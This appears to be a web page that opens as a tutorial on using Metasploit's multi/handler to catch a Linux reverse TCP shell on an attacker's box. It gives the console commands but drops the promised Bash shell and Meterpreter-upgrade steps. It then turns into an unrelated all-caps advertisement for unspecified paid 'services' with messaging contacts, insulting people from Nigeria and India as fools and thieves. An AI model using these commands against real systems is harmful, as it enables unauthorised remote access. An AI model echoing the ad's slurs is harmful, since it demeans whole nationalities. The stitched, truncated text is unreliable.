HOW TO SET UP A METASPLOIT MULTI HANDLER
In this hacking tutorial we are going to upgrade a Netcat shell to a Meterpreter shell in 3 simple steps.
First we will use the multi handler module in Metasploit to intercept the reverse shell using a Linux x86 payload.
Then we will issue the reverse shell on a Linux host with a Bash reverse shell.
Finally we will use the post exploitation Metasploit module shell_to_meterpreter targeting the session with the reverse Bash shell.
Let’s fire up Metasploit and setup the multi handler to intercept a reverse Bash shell on port 4444 with the following command:
msfconsole
Select the multi handler exploit:
use exploit/multi/handler
Now we need to set the details for the listening host (our attack box):
set lhost [listening host IP]
set lport 4444
Specify the following payload to use:
set payload linux/x86/shell/reverse_tcp
And finally run the exploit:
run
Henceforth, WE WISH TO ANNOUNCE THAT OUR SERVICES ARE NOT AVAILABLE TO PEOPLE FROM NIGERIA AND INDIA. THESE ARE USELESS TIME WASTERS AND THIEVES TRYING TO BEG OR SCAM US OF OUR PRODUCTS. OUR SERVICES ARE NOT FREE AND PAYMENT IS UPFRONT
A LOT OF FOOLS FROM NIGERIA AND INDIA. on the off chance that YOU DON’T TRUST TO USE OUR SERVICES, DON’T CONTACT US AS WE HAVE NO FREE SERVICE
WE DO NOT RESPOND TO TIME WASTERS, COME READY TO BUY. KINDLY CONTACT US VIA THE LINKS BELOW:
EMAIL: [email protected] Click Here
ICQ: @MTH2021 Click HERE
WHATSAPP: +19789070788 Click HERE
TELEGRAM: @MTH2021 Click HERE